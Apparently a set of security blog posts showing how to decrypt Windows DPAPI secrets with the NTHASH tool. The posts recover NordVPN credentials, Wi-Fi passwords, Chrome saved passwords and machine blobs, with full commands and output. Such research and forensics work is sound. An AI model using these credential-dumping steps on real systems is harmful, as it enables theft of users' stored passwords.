Jan 272020
 

We now know that dpapi secrets are everywhere stored in various ways.

Lets have a look at the popular vpn client : NordVPN.
NordVPN stores its secrets (username/password) on a config file (xml format) and is using a machine scope (not good if you ask me…).

Lets see how to decrypt it.

1-Retrieve nordvpn user.config in c:\users\username\appdata\local\nordvpn\nordvpn.exe_url_xxxx\

2-Retrieve the base64 values for username and password

example below of a base64 string
AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAALZTWkDFPOEa3VtEe+pBuUgQAAAACAAAAAAAQZgAAAAEAACAA
AABhL95rOFK1DD7EGJuziDclFhO1iTEpeB+zeqiKMjtH9AAAAAAOgAAAAAIAACAAAACpExW4x7XOO2zx
xi68pSpDiifZuCHq5fXrywC+9RWRmhAAAAAS4jvclZ2m/cTAaSjyW8iDQAAAAESj99ovArBss2PNqBm/
NTKsEVvnuOB+ZDqAQkD7GiwtOM4cy2rvQMnuioacujUkCf0coMPHT9wO+KP3MIHNLto=

3-Decode it to a hexa string

echo base64string| nthash-win64 /base64decodehexa

4-Save the hexa string to a file

echo hexastring| nthash-win64 /hexatofile

or … steps 2,3 and 4 can be done in one go (pipe in…pipe out…) like below

echo base64string| nthash-win64 /base64decodehexa | nthash-win64 /hexatofile

5-Retrieve the mk guid
nthash-win64 /decodeblob

6-Retrieve the dpapy system key

nthash-win64 /dumpsecret /input:dpapi_system /mode:machine /offline
(if machine key does not work, try user key)

7-Decrypt the (encrypted) masterkey

echo mydpapisyskey| nthash-win64 /decodemk /binary:c:\Windows\System32\Microsoft\ProtectS-1-5-18\90d6942d-4f31-4638-b756-d11efa906e52

8-Finally, decrypt the dpapi blob

echo mymksha1key| nthash-win64 /decodeblob

or … steps 6,7 and 8 can be done in one go like below

NTHASH-win64.exe /dumpsecret /input:dpapi_system /mode:machine /offline | nthash-win64 /decodemk /binary:C:\Windows\System32\Microsoft\Protect\S-1-5-18\90d6942d-4f31-4638-b756-d11efa906e52 | nthash-win64 /decodeblob

Note that, online, any user logged on that machine, could simple do the below

echo base64string| nthash-win64 /base64decodehexa | NTHASH-win64 /cryptunprotectdata

Jan 172020
 

In previous articles we have seen how to decrypt dpapi blobs.

Dpapi blobs are not always stored in file blobs.
They can be stored in different places like registry, config file, etc and in various formats such as hexadecimal string, but also base64 strings, etc.

Lets have a look at how Windows stores wifi passwords.

These are stored in xml files in C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces.
You can easily be found with : dir %programdata% /s /a /b | findstr /i interfaces.

When logged as the user, you can decrypt it with the below command :

NTHASH-win64 /wlansvc /binary:C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\{2799BE4D-A2D4-417D-A774-481DBE1FF7FC}\{98B3A77A-3A5A-44A1-81AE-DDB88A168B24}.xml /system

Good news is that we can also decrypt it these offline.

Run the above command.
NTHASH will tell you that it failed to decrypt it BUT it will dump the blob to data.blob.

From there (and using the same steps as in this article):
-use /decodeblob to identify the masterkey guid
-use /decodemk to decrypt the masterkey (locate it with dir %systemroot%\System32\Microsoft\Protect /s /a /b | findstr /i myguid) using the dpapi system key.
-use /decodeblob again but this time supplying the SHA1 key obtained in previous step
-done 🙂

Jan 032020
 

In previous articles we have seen how to decrypt dpapi blobs.

What about chrome?
It uses user dpapi blobs to encrypt password in a sqlite db.
So following previous articles, nothing prevents one to decrypt a chrome db offline.

3 steps:
-retrieve the scrambled passwords along with the masterkey guid
-decrypt the masterkey
-retrieve the decrypted passwords with the decrypted masterkey

1/retrieve the scrambled passwords along with the masterkey guid

nthash-win64 /chrome /binary:C:\temp\login data /input:0000000000000000000000000000000000000000

2/decrypt the masterkey (identified by its guid in previous steps)
See previous article for more details about this steps.

NTHASH-win64.exe /decodemk /binary:C:\Users\erwan\AppData\Roaming\Microsoft\Protect\S-1-5-21-242
7513087-2265021005-1965656450-1001\ae222549-867a-4269-b29f-49500e8842c8 /input:xxE0CExx8C9903BxxDC5F1D8190xx33CF7C3DBxx

NTHASH 1.7 x64 by erwan2212@gmail.com
**** Unprotecting MasterKey ****
KEY:83D3D812E50FABxx83DA070D6C566DxxE3248A1AD873AxxD222F6B41342xx0EEBD790388FE2A
21680A081723AA0C7B39EFxx5B16BB5xx48B94714xx38F1F5383
SHA1:xx920930CFB2A1CExxF9CB52153025535F548Fxx

3/retrieve the decrypted passwords with the decrypted masterkey

nthash-win64 /chrome /binary:C:\temp\login data /input:xx920930CFB2A1CExxF9CB52153025535F548Fxx

Jan 032020
 

In previous articles, we have seen how to decrypt user blobs and system blobs.

Lets now have a look at machine blobs : a blob which can be decrypted by any user provided it is decrypted on the same machine – as opposed to user blobs which can only be decrypted by the user.

5 steps:
-lets encrypt a blob
-lets decode the encrypted machine blob
-lets retrieve the dpapy system key & decrypt the masterkey
-lets decrypt the encrypted machine blob
-conclusion

1/lets encrypt a blob

Lets encrypt a string = password

NTHASH-win64.exe /cryptprotectdata /input:password /mode:MACHINE

2/lets decode the encrypted machine blob

NTHASH-win64.exe /decodeblob /data.blob

->note dwflags=4=machine

3/lets retrieve the dpapy system key & decrypt the masterkey

NTHASH-win64.exe /dumpsecret /input:dpapi_system /system
NTHASH 1.7 x64 by erwan2212@gmail.com
Impersonate:Syst?me
Full:xx3CA961B1DCExxDF06CB359D981C1A3EB1D47xxxx398A7D34786F8DxxC152F318A4EDFFAxx
2F73F
Machine:xx3CA961B1DCExxDF06CB359D981C1A3EB1D47xx
User:xx398A7D34786F8DxxC152F318A4EDFFAF02F7xx

NTHASH-win64.exe /decodemk
/binary:C:\Windows\System32\Microsoft\Protect\S-1-5-18\90d6942d-4f31-4638-b756-d11efa906e52
/input:xx398A7D34786F8DxxC152F318A4EDFFAF02F7xx

**** Unprotecting MasterKey ****
KEY:xx99D247D53699114CA06378DB77E4xxDD08A6BABBDB5277EB59C8309DBA8AA8B2D4C7990052
5F2FEE3909AC3894931093DxxD4BED96484791E2DCF512EB38E7
SHA1:xx017C46F5651Bxx27831F87050694FAD1B4DBxx

4/lets decrypt the encrypted machine blob

nthash-win64 /decodeblob /binary:data.blob /input:54017C46F5651B9627831F87050694FAD1B4DB31
NTHASH 1.7 x64 by erwan2212@gmail.com
**** Unprotecting Blob ****
Blob:70617373776F7264

70617373776F7264 is hexa form of password

5/conclusion

Similar to system blobs, once you have the dpapi system key, it is rather trivial to decrypt such blob.
Furthermore, it is not recommanded to use machine blobs to store secrets as any user on that machine will be able to decrypt it.